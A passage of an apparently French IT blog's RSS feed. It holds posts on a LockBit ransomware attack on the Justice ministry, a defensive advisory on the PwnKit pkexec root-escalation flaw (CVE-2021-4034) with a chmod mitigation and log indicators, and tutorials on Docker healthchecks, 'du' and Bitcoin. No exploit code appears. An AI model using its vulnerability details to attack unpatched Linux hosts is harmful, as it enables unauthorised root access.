l’alerte a bien été prise en compte et que les services compétents sont actuellement en train de procéder à des vérifications.</p><p>Selon le journaliste du site Acteurs publics <a href="https://twitter.com/emile_marzolf/status/1486711427511451651?ref=insys.fr">Emile Marzolf</a>, des sources internes confirment qu’une attaque a bien eu lieu, mais aucune information n’a été donnée sur la portée de celle-ci.</p><figure class="kg-card kg-embed-card"><blockquote class="twitter-tweet"><p lang="fr" dir="ltr">?La cyberattaque sur le ministère de la Justice m&#39;est confirmée de source interne au ministère. Pas d&#39;avantages d&#39;infos sur son ampleur et ses conséquences. <a href="https://t.co/gzsvCQuqYk?ref=insys.fr">https://t.co/gzsvCQuqYk</a></p>&mdash; Emile Marzolf (@emile_marzolf) <a href="https://twitter.com/emile_marzolf/status/1486711427511451651?ref_src=twsrc%5Etfw&ref=insys.fr">January 27, 2022</a></blockquote>
<script async src="https://platform.twitter.com/widgets.js" charset="utf-8"></script>
</figure><p><br></p><h2 id="qu%E2%80%99est-ce-que-le-ransomware-lockbit"><strong>Qu’est-ce que le ransomware </strong>LockBit <strong>?</strong></h2><p>Le ransomware, ou rançonlogiciel en français LockBit est un logiciel malveillant conçu pour bloquer l'accès des utilisateurs aux systèmes informatiques et lever le blocage en échange d'une rançon. LockBit analyse automatiquement les ressources importantes, propage l'infection et chiffre tous les systèmes informatiques accessibles d'un réseau. Ce ransomware est utilisé pour les attaques hautement ciblées à l'encontre d'entreprises et autres organismes. Dans le cadre d'une cyberattaque, les cybercriminels utilisant LockBit se démarquent en menaçant les entreprises du monde entier de la manière suivante :</p><ul><li><strong><strong>Perturbation des opérations</strong></strong> avec arrêt soudain des fonctions essentielles</li><li><strong><strong>Extorsion</strong></strong> de gains financiers au profit des cybercriminels</li><li><strong><strong>Vol de données et publication illégale</strong></strong> avec chantage si la victime refuse d'obtempérer</li></ul> ]]></content:encoded>
                </item>
                <item>
                    <title><![CDATA[ PwnKit : Découverte d&#x27;une vulnérabilité d&#x27;escalade de privilèges locaux dans pkexec de polkit (CVE-2021-4034) ]]></title>
                    <description><![CDATA[ CVE-2021-4034 - PwnKit : la commande pkexec de Polkit contient une faille de sécurité qui permet à l&#39;attaquant de devenir &quot;root&quot; sur une machine Linux. ]]></description>
                    <link>https://insys.fr/blog/pwnkit-decouverte-dune-vulnerabilite-descalade-de-privileges-locaux-dans-pkexec-de-polkit-cve-2021-4034/</link>
                    <guid isPermaLink="false">61f2796d2c028300617c88b5</guid>
                    <category><![CDATA[ Sécurité ]]></category>
                    <dc:creator><![CDATA[ INSYS ]]></dc:creator>
                    <pubDate>Thu, 27 Jan 2022 13:00:00 +0100</pubDate>
                    <media:content url="https://insys.fr/content/images/2022/01/PwnKit.jpg" medium="image"/>
                    <content:encoded><![CDATA[ <p>L'équipe de recherche <a href="https://www.qualys.com/?ref=insys.fr">Qualys</a> a découvert <a href="https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034?ref=insys.fr">une vulnérabilité - faille de corruption de mémoire dans pkexec de polkit</a> identifié sous le nom de <a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4034&ref=insys.fr">CVE-2021-4034</a>. <br>C'est un programme SUID-root qui est installé par défaut sur toutes les principales distributions Linux. Cette vulnérabilité facilement exploitable permet à tout utilisateur non privilégié d'obtenir les privilèges complets de root sur un hôte vulnérable en exploitant cette vulnérabilité dans sa configuration par défaut.<br><br></p><h2 id="%C3%A0-propos-de-polkit-pkexec-pour-linux">À propos de Polkit pkexec pour Linux</h2><p>Polkit (anciennement PolicyKit) est un composant permettant de contrôler les privilèges à l'échelle du système dans les systèmes d'exploitation de type Unix. Il fournit un moyen organisé pour les processus non privilégiés de communiquer avec les processus privilégiés. Il est également possible d'utiliser polkit pour exécuter des commandes avec des privilèges élevés en utilisant la commande pkexec suivie de la commande destinée à être exécutée (avec la permission de root).<br><br></p><h2 id="impact-potentiel-de-la-vuln%C3%A9rabilit%C3%A9-pwnkit">Impact potentiel de la vulnérabilité PwnKit</h2><p>Une exploitation réussie de cette vulnérabilité permet à tout utilisateur non privilégié d'obtenir les privilèges "root" sur l'hôte vulnérable. Les chercheurs en sécurité de <a href="https://www.qualys.com/?ref=insys.fr">Qualys</a> ont pu vérifier indépendamment la vulnérabilité, développer un exploit et obtenir les privilèges root complets sur les installations par défaut d'<a href="https://ubuntu.com/?ref=insys.fr">Ubuntu</a>, <a href="https://www.debian.org/?ref=insys.fr">Debian</a>, <a href="https://getfedora.org/?ref=insys.fr">Fedora</a> et <a href="https://www.centos.org/?ref=insys.fr">CentOS</a>. D'autres distributions Linux - Unix comme par exemple <a href="https://www.oracle.com/solaris/solaris11/?ref=insys.fr">Solaris</a>, <a href="https://www.redhat.com/?ref=insys.fr">RHEL</a> (RedHat) sont probablement vulnérables et probablement exploitables. Cependant nous savons qu'<a href="https://www.openbsd.org/?ref=insys.fr">OpenBSD</a> ne peut pas être attaqué par des exploits utilisant cette vulnérabilité. <br><br>Cette vulnérabilité se cache au grand jour <strong>depuis plus de 12 ans</strong> et affecte toutes les versions de pkexec depuis sa première version en mai 2009 (commit c8c3d83, "Add a pkexec(1) command").<br><br></p><h2 id="pourquoi-est-elle-si-dangereuse">Pourquoi est-elle si dangereuse ?</h2><p>Il y a plusieurs raisons à cela:</p><ul><li>Pkexec est installé par défaut sur toutes les principales distributions Linux (<a href="https://ubuntu.com/?ref=insys.fr">Ubuntu</a>, <a href="https://www.debian.org/?ref=insys.fr">Debian</a>, <a href="https://getfedora.org/?ref=insys.fr">Fedora</a>, <a href="https://www.centos.org/?ref=insys.fr">CentOS</a>, <a href="https://archlinux.org/?ref=insys.fr">Arch Linux</a> et d'autres distributions sont<br>probablement aussi exploitables).</li><li>Pkexec est vulnérable depuis sa création, en mai 2009 (commit c8c3d83, "Add a pkexec(1) command").</li><li>N'importe quel utilisateur local non privilégié peut exploiter cette vulnérabilité pour obtenir des privilèges complets de root.</li><li>Bien que cette vulnérabilité soit techniquement une corruption de mémoire, elle est exploitable instantanément, de manière fiable et indépendante de l'architecture.</li><li>Et elle est exploitable même si le démon polkit lui-même n'est pas en cours d'exécution.</li></ul><p>Notons également que <a href="https://www.redhat.com/en?ref=insys.fr">Red Hat</a> évalue le <a href="https://access.redhat.com/security/cve/CVE-2021-4034?ref=insys.fr">PwnKit comme ayant un score CVSS (Common Vulnerability Scoring System) de 7.8</a>. Ce score est élevé.<br><br></p><h2 id="comment-corriger-att%C3%A9nuer-la-vuln%C3%A9rabilit%C3%A9">Comment corriger / atténuer la vulnérabilité ?</h2><p>Si aucun correctifs ne sont disponibles pour votre système d'exploitation et donc qu'il vous est impossible d'appliquer une mise à jour qui viendrait corriger cette vulnérabilités (ce qui est probablement le cas au moment de publication de cet article), vous pouvez supprimer le bit SUID-bit de pkexec comme mesure d'atténuation temporaire ; par exemple :</p><!--kg-card-begin: markdown--><pre><code>chmod 0755 /usr/bin/pkexec
</code></pre>
<!--kg-card-end: markdown--><p></p><p>Restez prudent et attentif aux traces dans les journaux de vos systèmes. En général, il s'agira d'un message du type "The value for the SHELL variable was not found in the /etc/shells file" ou "The value for environment variable […] contains suspicious content.".</p><p>Mais attention un attaquant expérimenté peut réaliser un assaut PwnKit sans laisser de traces dans les journaux.<br><br></p><h2 id="d%C3%A9monstration-de-qualys">Démonstration de Qualys</h2><p>Voici une vidéo, montrant l'exploitation de la vulnérabilité:</p><figure class="kg-card kg-embed-card"><iframe src="https://player.vimeo.com/video/669715589?h=3bf67eea45&amp;app_id=122963" width="640" height="360" frameborder="0" allow="autoplay; fullscreen; picture-in-picture" allowfullscreen title="PwnKit Vulnerability"></iframe></figure><p><br>À vos patchs !</p> ]]></content:encoded>
                </item>
                <item>
                    <title><![CDATA[ Comment (et pourquoi) ajouter une vérification de l&#x27;état de santé sur vos conteneurs Docker ]]></title>
                    <description><![CDATA[ Les contrôles de santé (healthcheck) de Docker permettent à un conteneur d&#39;exposer la disponibilité de sa charge de travail. Il ne s&#39;agit pas de savoir si le conteneur est en cours d&#39;exécution. ]]></description>
                    <link>https://insys.fr/blog/comment-et-pourquoi-ajouter-des-controles-de-sante-a-vos-conteneurs-docker/</link>
                    <guid isPermaLink="false">61f16ead2c028300617c87a2</guid>
                    <category><![CDATA[ Cloud ]]></category>
                    <dc:creator><![CDATA[ INSYS ]]></dc:creator>
                    <pubDate>Thu, 27 Jan 2022 09:00:00 +0100</pubDate>
                    <media:content url="https://images.unsplash.com/photo-1531355618229-d19728b4581e?crop&#x3D;entropy&amp;cs&#x3D;tinysrgb&amp;fit&#x3D;max&amp;fm&#x3D;jpg&amp;ixid&#x3D;MnwxMTc3M3wwfDF8c2VhcmNofDUyfHxqdXN0aW4lMjBiZWNrJTIwY29udGFpbmVyfGVufDB8fHx8MTY0MzIxNjI3OA&amp;ixlib&#x3D;rb-1.2.1&amp;q&#x3D;80&amp;w&#x3D;2000" medium="image"/>
                    <content:encoded><![CDATA[ <p>Vous avez construit votre image Docker, l'avez poussée vers votre registre et avez démarré un nouveau conteneur en production. Tout fonctionne alors que vous rentrez chez vous pour la journée, mais vous êtes confronté à des rapports de panne à votre retour le lendemain matin. Votre conteneur fonctionne toujours, mais il ne répond pas aux demandes.</p><p>Ce scénario peut sembler familier aux équipes d'exploitation qui travaillent avec Docker. Voici comment utiliser la fonction de vérification de l'état de santé de vos conteneurs Docker pour obtenir des données précises sur la disponibilité de vos services.<br><br></p><h2 id="comment-fonctionne-la-v%C3%A9rification-de-l%C3%A9tat-de-sant%C3%A9">Comment fonctionne la vérification de l'état de santé</h2><p>Les contrôles de santé permettent à un conteneur d'exposer la disponibilité de sa charge de travail. Il ne s'agit pas de savoir si le conteneur est en cours d'exécution. Si votre base de données tombe en panne, votre serveur API ne sera pas en mesure de traiter les demandes, même si son conteneur Docker est toujours en cours d'exécution.</p><!--kg-card-begin: markdown--><p>Cela donne lieu à des expériences peu utiles lors du dépannage. Un simple <code>docker ps</code> indique que le conteneur est disponible. L'ajout d'un contrôle de santé étend la sortie de <code>docker ps</code> pour inclure l'état réel du conteneur.</p>
<!--kg-card-end: markdown--><p>Vous configurez les contrôles de santé des conteneurs dans votre Dockerfile. Celui-ci accepte une commande que le démon Docker exécutera toutes les 30 secondes. Docker utilise le code de sortie de la commande pour déterminer l'état de santé de votre conteneur :</p><!--kg-card-begin: markdown--><ol start="0">
<li>Le conteneur est sain et fonctionne normalement.</li>
<li>Le conteneur n'est pas en bonne santé ; la charge de travail peut ne pas fonctionner.</li>
<li>Ce code d'état est réservé par Docker et ne doit pas être utilisé.</li>
</ol>
<!--kg-card-end: markdown--><!--kg-card-begin: markdown--><p>Lorsque <code>HEALTHCHECK</code> est présent dans un Dockerfile, vous verrez l'état de santé du conteneur dans la colonne <code>STATUS</code> lorsque vous exécutez <code>docker ps</code>.</p>
<!--kg-card-end: markdown--><figure class="kg-card kg-image-card kg-width-wide"><img src="https://insys.fr/content/images/2022/01/docker-healthcheck.png" class="kg-image" alt loading="lazy" width="1285" height="187" srcset="https://insys.fr/content/images/size/w600/2022/01/docker-healthcheck.png 600w, https://insys.fr/content/images/size/w1000/2022/01/docker-healthcheck.png 1000w, https://insys.fr/content/images/2022/01/docker-healthcheck.png 1285w" sizes="(min-width: 1200px) 1200px"></figure><p>L'état de santé n'est pas vérifié immédiatement lorsque les conteneurs sont créés. L'état sera indiqué comme démarrant avant que la première vérification ne soit exécutée. Cela donne au conteneur le temps d'exécuter les tâches de démarrage. Un conteneur dont l'état de santé a été vérifié avec succès s'affiche comme sain ; un conteneur en mauvaise santé s'affiche comme non sain.<br><br></p><h2 id="%C3%A9crire-les-commandes-de-contr%C3%B4le-de-sant%C3%A9">Écrire les commandes de contrôle de santé</h2><!--kg-card-begin: markdown--><p>Les contrôles de santé des conteneurs sont configurés avec l'instruction <code>HEALTHCHECK</code> dans votre Dockerfile. Vous devez utiliser une commande de vérification de l'état de santé appropriée pour votre conteneur. Pour les serveurs web, curl vous offre un moyen simple d'effectuer un contrôle de base de la disponibilité. Effectuez un ping sur un point de terminaison connu qui devrait être disponible lorsque votre service est en service.</p>
<!--kg-card-end: markdown--><!--kg-card-begin: markdown--><pre><code>FROM nginx:latest
HEALTHCHECK CMD curl --fail http://localhost/api/healthcheck || exit 1
</code></pre>
<!--kg-card-end: markdown--><p></p><!--kg-card-begin: markdown--><p>Dans cet exemple, le conteneur serait marqué comme étant non sain si le point de terminaison <code>/api/healthcheck</code> de votre serveur émettait un état d'erreur.<br>
Vous pouvez utiliser <code>docker inspect</code> pour voir la sortie des commandes de contrôle de santé. Ceci est utile lorsque vous déboguez votre instruction <code>HEALTHCHECK</code>.</p>
<!--kg-card-end: markdown--><!--kg-card-begin: markdown--><pre><code>docker inspect --format='{{json .State.Health}}' my-container
</code></pre>
<!--kg-card-end: markdown--><p></p><!--kg-card-begin: markdown--><p>Remplacez <code>my-container</code> par l'ID ou le nom du conteneur que vous souhaitez inspecter. Ces détails sont affichés dans la sortie <code>docker ps</code>.</p>
<!--kg-card-end: markdown--><h2 id="personnaliser-les-bilans-de-sant%C3%A9"><br>Personnaliser les bilans de santé</h2><p>Docker vous permet de personnaliser la fréquence des contrôles de santé. Vous pouvez également modifier les critères qui marquent un conteneur comme étant non sain.</p><!--kg-card-begin: markdown--><p>Quatre options sont disponibles :</p>
<ul>
<li>
<p><code>--intervalle</code> - Définit le temps entre les contrôles de santé. Ceci vous permet de remplacer la valeur par défaut de 30 secondes. Utilisez un intervalle plus élevé pour augmenter le temps entre les contrôles. Ceci est utile si vous avez un service de faible priorité pour lequel des contrôles de santé réguliers pourraient avoir un impact sur les performances. Utilisez une fréquence plus régulière pour les services critiques.</p>
</li>
<li>
<p><code>--start-period</code> - Définit la durée après le démarrage d'un conteneur pendant laquelle les contrôles de santé doivent être ignorés. La commande sera quand même exécutée mais un état non sain ne sera pas comptabilisé. Cela donne aux conteneurs le temps de terminer les procédures de démarrage.</p>
</li>
<li>
<p><code>--retries</code> - Cette option vous permet d'exiger plusieurs échecs successifs avant qu'un conteneur ne soit marqué comme étant en mauvaise santé. La valeur par défaut est de 3. Si un contrôle de santé échoue mais que le suivant est réussi, le conteneur ne passera pas à l'état non sain. Il deviendra malsain après trois échecs consécutifs.</p>
</li>
<li>
<p><code>--timeout</code> - Définit le délai d'attente pour les commandes de contrôle de santé. Docker considérera que le contrôle a échoué si la commande ne se termine pas dans ce délai.</p>
</li>
</ul>
<!--kg-card-end: markdown--><!--kg-card-begin: markdown--><p>Les options sont transmises comme des drapeaux à l'instruction <code>HEALTHCHECK</code>. Il faut les fournir avant la commande de contrôle de santé :</p>
<!--kg-card-end: markdown--><!--kg-card-begin: markdown--><pre><code>HEALTHCHECK --interval=60s --retries=5 CMD curl --fail http://localhost || exit 1
</code></pre>
<!--kg-card-end: markdown--><p></p><!--kg-card-begin: markdown--><p>Cette configuration demande à Docker d'exécuter <code>curl</code> toutes les 60 secondes. Le conteneur sera marqué comme étant en mauvaise santé si cinq tests consécutifs ont un code de sortie non nul.</p>
<!--kg-card-end: markdown--><p></p><h2 id="format-des-commandes"><br>Format des commandes</h2><!--kg-card-begin: markdown--><p>La syntaxe de la commande <code>HEALTHCHECK</code> supporte soit un simple <code>CMD</code>, soit un tableau <code>exec</code> de type point d'entrée. Vous pouvez également passer <code>NONE</code> au lieu de <code>CMD</code> pour désactiver les contrôles de santé :</p>
<!--kg-card-end: markdown--><!--kg-card-begin: markdown--><pre><code>HEALTHCHECK NONE
</code></pre>
<!--kg-card-end: markdown--><p></p><!--kg-card-begin: markdown--><p>Cela vous permet d'inhiber les contrôles de santé de votre image de base. Chaque instruction <code>HEALTHCHECK</code> remplace toutes les instructions précédentes dans les calques de votre image.</p>
<!--kg-card-end: markdown--><p></p><h2 id="quen-est-il-de-docker-compose"><br>Qu'en est-il de Docker Compose ?</h2><!--kg-card-begin: markdown--><p>Docker Compose prend également en charge les définitions de contrôle de santé. Ajoutez une section <code>healthcheck</code> à votre service :</p>
<!--kg-card-end: markdown--><!--kg-card-begin: markdown--><pre><code>version: &quot;3&quot;
services:
  app:
    image: nginx:latest
    ports:
      - 80:80
    healthcheck:
      test: curl --fail http://localhost || exit 1
      interval: 10s
      retries: 5
      start_period: 5s
      timeout: 10s
</code></pre>
<!--kg-card-end: markdown--><p></p><!--kg-card-begin: markdown--><p>La propriété <code>test</code> définit la commande à exécuter. Les autres propriétés correspondent aux paramètres acceptés par l'instruction <code>HEALTHCHECK</code> dans le Dockerfile.</p>
<!--kg-card-end: markdown--><p></p><h2 id="r%C3%A9sum%C3%A9"><br>Résumé</h2><!--kg-card-begin: markdown--><p>La définition d'une instruction <code>HEALTHCHECK</code> facilite le diagnostic d'un conteneur qui se comporte mal. Vous pouvez suivre l'état de préparation de votre charge de travail indépendamment de l'état d'exécution du conteneur.</p>
<p>Les contrôles de santé sont compatibles avec toute commande qui émet un code de sortie <code>0</code> ou <code>1</code>. Vous pouvez utiliser des commandes courantes comme <code>curl</code> et <code>ping</code> pour inspecter les services Web et les bases de données. Pour un contrôle plus avancé, écrivez un script dédié et incluez-le dans vos images.</p>
<!--kg-card-end: markdown--> ]]></content:encoded>
                </item>
                <item>
                    <title><![CDATA[ Comment vérifier la taille d&#x27;un répertoire avec Linux ]]></title>
                    <description><![CDATA[ Il est possible vérifier facilement et de façon lisible la taille d&#39;un répertoire avec Linux à l&#39;aide de la commande &quot;du&quot; ]]></description>
                    <link>https://insys.fr/blog/comment-verifier-la-taille-d-un-repertoire-avec-linux/</link>
                    <guid isPermaLink="false">61eed67509433e0061b3961c</guid>
                    <category><![CDATA[ Linux ]]></category>
                    <dc:creator><![CDATA[ INSYS ]]></dc:creator>
                    <pubDate>Mon, 24 Jan 2022 18:35:22 +0100</pubDate>
                    <media:content url="https://images.unsplash.com/photo-1629654291663-b91ad427698f?crop&#x3D;entropy&amp;cs&#x3D;tinysrgb&amp;fit&#x3D;max&amp;fm&#x3D;jpg&amp;ixid&#x3D;MnwxMTc3M3wwfDF8c2VhcmNofDF8fHVidW50dXxlbnwwfHx8fDE2NDMwNDQ4Mjc&amp;ixlib&#x3D;rb-1.2.1&amp;q&#x3D;80&amp;w&#x3D;2000" medium="image"/>
                    <content:encoded><![CDATA[ <!--kg-card-begin: markdown--><p>Alors que la commande Linux <code>ls</code> peut afficher la taille des fichiers, elle ne fonctionne pas correctement avec les répertoires, qui seront toujours affichés comme 4096 octets. Vous devrez utiliser la commande <code>du</code> pour faire des recherches dans les sous-répertoires et afficher le total.</p>
<!--kg-card-end: markdown--><p><br></p><h2 id="utilisation-de-la-commande-du">Utilisation de la commande "du"</h2><!--kg-card-begin: markdown--><p>Le meilleur remplacement de <code>ls</code> est d'utiliser <code>du</code> avec quelques drapeaux :</p>
<!--kg-card-end: markdown--><!--kg-card-begin: markdown--><pre><code>du -had 1
</code></pre>
<!--kg-card-end: markdown--><p></p><!--kg-card-begin: markdown--><p>Le drapeau <code>-h</code> signifie &quot;human readable&quot; (lisible par l'homme) et formatera les tailles en Ko, Mo et Go.</p>
<p>L'option <code>-a</code> signifie &quot;all&quot;, et inclura les fichiers individuels ainsi que les répertoires, ce qui est utile pour imiter le fonctionnement de <code>ls</code>.</p>
<p>L'option <code>-d 1</code> est une limite à la profondeur à laquelle du imprimera les résultats. Par défaut, il est configuré pour imprimer chaque sous-répertoire, ce qui peut être pénible si vous avez beaucoup de fichiers imbriqués. Le drapeau <code>-d</code> les additionnera tous et imprimera le total pour chaque répertoire visible à partir duquel vous exécutez la commande.</p>
<!--kg-card-end: markdown--><figure class="kg-card kg-image-card kg-width-wide"><img src="https://insys.fr/content/images/2022/01/dudh1.png" class="kg-image" alt loading="lazy" width="272" height="98"></figure><!--kg-card-begin: markdown--><p>Si vous préférez qu'elle liste chaque répertoire, vous pouvez lancer la commande avec l'option <code>--apparent-size</code>, qui affichera la taille totale de chaque sous-répertoire comme si vous aviez fait &quot;Clic droit &gt; Propriétés&quot; dans votre explorateur de fichiers.</p>
<!--kg-card-end: markdown--><!--kg-card-begin: markdown--><p>Tout ceci est cependant mélangé, donc si vous souhaitez afficher les plus grands répertoires dans le dossier actuel, vous pouvez diriger la sortie vers la commande <code>sort</code>. Assurez-vous d'utiliser également l'option <code>-h</code>, sinon la commande <code>sort</code> traitera <code>128 Mo</code> comme un nombre plus grand que <code>1 Go</code>.</p>
<!--kg-card-end: markdown--><!--kg-card-begin: markdown--><pre><code>du -had 1 | sort -rh
</code></pre>
<!--kg-card-end: markdown--><p></p><figure class="kg-card kg-image-card kg-width-wide"><img src="https://insys.fr/content/images/2022/01/duhad1sortrh.png" class="kg-image" alt loading="lazy" width="336" height="98"></figure><!--kg-card-begin: markdown--><p>Par défaut, <code>du</code> utilise le répertoire courant, mais vous pouvez également cibler des répertoires spécifiques. Il suffit de passer l'emplacement en tant que dernier argument.</p>
<!--kg-card-end: markdown--><!--kg-card-begin: markdown--><pre><code>du -had 1 ./monrepertoire/
</code></pre>
<!--kg-card-end: markdown--><p><br></p><h2 id="trouver-les-r%C3%A9pertoires-qui-prennent-le-plus-despace-sur-votre-serveur">Trouver les répertoires qui prennent le plus d'espace sur votre serveur</h2><!--kg-card-begin: markdown--><p>Une tâche courante sous Linux est le débogage de grandes quantités d'utilisation de disque. Si vous souhaitez afficher l'utilisation totale pour chaque disque, vous pouvez utiliser <code>df -h</code>.<br>
Cependant, cette méthode ne permet pas d'explorer les répertoires et ne trouvera pas la source du problème.</p>
<p>Pour cela, vous pouvez utiliser <code>du</code>, mais enlevez le drapeau <code>-d 1</code> pour qu'il cherche dans tous les répertoires. Ciblez-le à la racine, triez-le, et filtrez les 25 premiers répertoires pour que votre écran ne soit pas surchargé.</p>
<!--kg-card-end: markdown--><!--kg-card-begin: markdown--><pre><code>du -ah / | sort -rh | head -n 10
</code></pre>
<!--kg-card-end: markdown--><p></p><figure class="kg-card kg-image-card kg-width-wide"><img src="https://insys.fr/content/images/2022/01/duahsortrhheadn10.png" class="kg-image" alt loading="lazy" width="670" height="340" srcset="https://insys.fr/content/images/size/w600/2022/01/duahsortrhheadn10.png 600w, https://insys.fr/content/images/2022/01/duahsortrhheadn10.png 670w"></figure><p></p><!--kg-card-begin: markdown--><p>Il se peut qu'il affiche quelques erreurs pour les fichiers auxquels il ne peut pas accéder ; assurez-vous de l'exécuter avec <code>sudo</code>.</p>
<!--kg-card-end: markdown--> ]]></content:encoded>
                </item>
                <item>
                    <title><![CDATA[ Pourquoi Bitcoin a-t-il été créé ? ]]></title>
                    <description><![CDATA[ Le pourquoi du comment du Bitcoin, une technologie pair à pair fonctionnant sans autorité centrale. La gestion des transactions et la création de bitcoins est prise en charge collectivement par le réseau. ]]></description>
                    <link>https://insys.fr/blog/pourquoi-bitcoin-a-t-il-ete-cree/</link>
                    <guid isPermaLink="false">61dc3d06fbe7bb00678cf560</guid>
                    <category><![CDATA[ Bitcoin ]]></category>
                    <dc:creator><![CDATA[ INSYS ]]></dc:creator>
                    <pubDate>Mon, 10 Jan 2022 16:44:00 +0100</pubDate>
                    <media:content url="https://insys.fr/content/images/2022/01/bef495c3-0cc5-44d1-9510-290e0270b53d.jpg" medium="image"/>
                    <content:encoded><![CDATA[ <p>Pour certains, le fait que Satoshi Nakamoto, « l'inventeur du Bitcoin », soit une personne ou un groupe de personnes non identifié, soulève des signaux d'alarme. Bien que leur anonymat ait l'avantage de susciter davantage d'intérêt, il délégitime également la technologie aux yeux des autres. C'est pourquoi il est important de discuter de ce qui a pu motiver Satoshi à créer Bitcoin.</p><figure class="kg-card kg-bookmark-card"><a class="kg-bookmark-container" href="https://bitcoin.org/fr/?ref=insys.fr"><div class="kg-bookmark-content"><div class="kg-bookmark-title">Bitcoin - Argent P2P libre et ouvert</div><div class="kg-bookmark-description">Bitcoin est un réseau de paiement novateur et une nouvelle forme d’argent. Trouvez tout ce que vous devez savoir et débutez avec Bitcoin sur bitcoin.org.</div><div class="kg-bookmark-metadata"><img class="kg-bookmark-icon" src="https://bitcoin.org/favicon.png?1641218872" alt=""><span class="kg-bookmark-author">Bitcoin</span></div></div><div class="kg-bookmark-thumbnail"><img src="https://bitcoin.org/img/icons/opengraph.png?1641218872" alt=""></div></a></figure><p><br></p><h2 id="quelle-est-lid%C3%A9e-derri%C3%A8re-le-bitcoin">Quelle est l'idée derrière le Bitcoin ?</h2><p>Satoshi Nakamoto voulait créer un système de trésorerie « sans confiance ».</p><p>Satoshi a explicitement déclaré que la raison de la création de ce système d'argent numérique est de supprimer les intermédiaires tiers qui sont traditionnellement requis pour effectuer des transferts monétaires numériques. Les tiers encourent des coûts importants pour la réalisation de ces services ; ces coûts sont ensuite répercutés sur les utilisateurs finaux et peuvent restreindre les transactions en deçà d'une certaine taille. Ces coûts comprennent :</p><ul><li>Couvrir les dépenses de back-office - l'effort nécessaire pour collecter et rapprocher les données transactionnelles ;</li><li>Prendre les mesures de sécurité appropriées - les coûts liés au risque de failles de sécurité étant donné qu'il s'agit de référentiels centralisés de données sensibles ;</li><li>Et la comptabilisation des activités frauduleuses - les coûts associés au remboursement de l'argent en cas de fraude, entre autres.</li></ul><p>Bon nombre de ces coûts sont un montant fixe par transaction, quelle que soit la taille de la transaction. Cependant, étant donné que le bénéfice réalisé par transaction est en grande partie un pourcentage de la taille, le jus ne justifie pas la compression pour le traitement de transactions plus petites.</p><p>En bref, les banques, les associations de cartes (comme Visa) et d'autres grands opérateurs historiques possèdent le système de paiement électronique actuel et imposent de <strong><strong><em><em>nombreux</em></em></strong></strong> frais. (Visa a généré à lui seul plus de 13 milliards de dollars de revenus en 2015.) Le contournement de ces acteurs a certainement été un facteur de motivation pour la création de Bitcoin. Mais, il y a encore plus à cela. En février 2009, Satoshi a écrit ce qui suit sur un forum en ligne axé sur les pairs :</p><div class="kg-card kg-callout-card kg-callout-card-grey"><div class="kg-callout-emoji">?</div><div class="kg-callout-text"><em><em>« Le problème fondamental de la monnaie conventionnelle est toute la confiance nécessaire à son bon fonctionnement. On doit faire confiance à la banque centrale pour ne pas déprécier la monnaie, mais l'histoire des monnaies fiduciaires est pleine d'atteintes à cette confiance. On doit faire confiance aux banques pour détenir notre argent et le transférer par voie électronique, mais elles le prêtent par vagues de bulles de crédit avec à peine une fraction en réserve. »</em></em></div></div><p></p><p>En plus de payer les frais généraux, le recours aux systèmes de paiement électroniques traditionnels a d'autres implications majeures. Ces implications nous obligent à prendre du recul et à réfléchir au fonctionnement de notre système financier au sens large et au rôle que joue notre gouvernement dans le contrôle de l'offre monétaire. Nous allons nous concentrer sur les deux abus de confiance mentionnés par Satoshi ci-dessus (dans l'ordre inverse).</p><p><br></p><h2 id="1-faire-confiance-aux-banques">1. Faire confiance aux banques</h2><p>Lorsque nous laissons notre argent sur des comptes bancaires (pour qu'ils soient transférés en notre nom), ces dépôts ne sont pas réellement détenus pour nous. Au lieu de cela, les dépôts sont utilisés par les banques pour trouver des opportunités de rendement financier supplémentaire et ils ne sont légalement tenus de garder qu'un certain pourcentage de votre argent en main - environ 10 % pour les grandes banques. L'une de ces possibilités est d'offrir des produits de prêt (c.-à-d. couvrir l'hypothèque ou l'achat d'une voiture de quelqu'un d'autre) en échange du principal plus: les intérêts. L'octroi de crédit n'est pas nécessairement une mauvaise chose. Cependant, lorsque vous ajoutez plus d'acteurs, des instruments financiers plus complexes et moins de transparence, cela peut conduire à des niveaux de prêt insoutenables qui entraînent des pertes importantes lorsque les marchés se corrigent. (Par exemple, la Grande Récession de 2008.)</p><figure class="kg-card kg-bookmark-card"><a class="kg-bookmark-container" href="https://fr.wikipedia.org/wiki/Crise_%C3%A9conomique_mondiale_de_2008?ref=insys.fr"><div class="kg-bookmark-content"><div class="kg-bookmark-title">Crise économique mondiale de 2008 — Wikipédia</div><div class="kg-bookmark-description"></div><div class="kg-bookmark-metadata"><img class="kg-bookmark-icon" src="https://fr.wikipedia.org/static/apple-touch/wikipedia.png" alt=""><span class="kg-bookmark-author">Wikimedia Foundation, Inc.</span><span class="kg-bookmark-publisher">Contributeurs aux projets Wikimedia</span></div></div><div class="kg-bookmark-thumbnail"><img src="https://upload.wikimedia.org/wikipedia/commons/thumb/5/57/GDP_Real_Growth_in_2009.svg/1200px-GDP_Real_Growth_in_2009.svg.png" alt=""></div></a></figure><p><br></p><p>Pour expliquer, prenons l'exemple des hypothèques :</p><figure class="kg-card kg-image-card kg-width-full"><img src="https://insys.fr/content/images/2022/01/1_IUaJXKmiOUHpqOzDLCdXUQ.png" class="kg-image" alt loading="lazy" width="1108" height="717" srcset="https://insys.fr/content/images/size/w600/2022/01/1_IUaJXKmiOUHpqOzDLCdXUQ.png 600w, https://insys.fr/content/images/size/w1000/2022/01/1_IUaJXKmiOUHpqOzDLCdXUQ.png 1000w, https://insys.fr/content/images/2022/01/1_IUaJXKmiOUHpqOzDLCdXUQ.png 1108w"></figure><p><br></p><div class="kg-card kg-button-card kg-align-center"><a href="#" class="kg-btn kg-btn-accent">1</a></div><p><br>Une banque accorde un prêt hypothécaire à un emprunteur. Ils collectent des informations concernant le pointage de crédit des emprunteurs, les revenus, la valeur du prêt par rapport à la valeur de la propriété, etc.</p><p><br></p><div class="kg-card kg-button-card kg-align-center"><a href="#" class="kg-btn kg-btn-accent">2</a></div><p><br>Les informations sur les hypothèques sont ensuite transmises au marché hypothécaire secondaire afin que les hypothèques associées à un ensemble diversifié d'emprunteurs, de zones géographiques et de profils puissent être regroupées pour créer un actif investissable appelé "<a href="https://fr.wikipedia.org/wiki/Titre_adoss%C3%A9_%C3%A0_des_cr%C3%A9ances_hypoth%C3%A9caires?ref=insys.fr">Titre adossé à des créances hypothécaires</a>". Pendant la crise, cela était principalement le fait des grandes banques 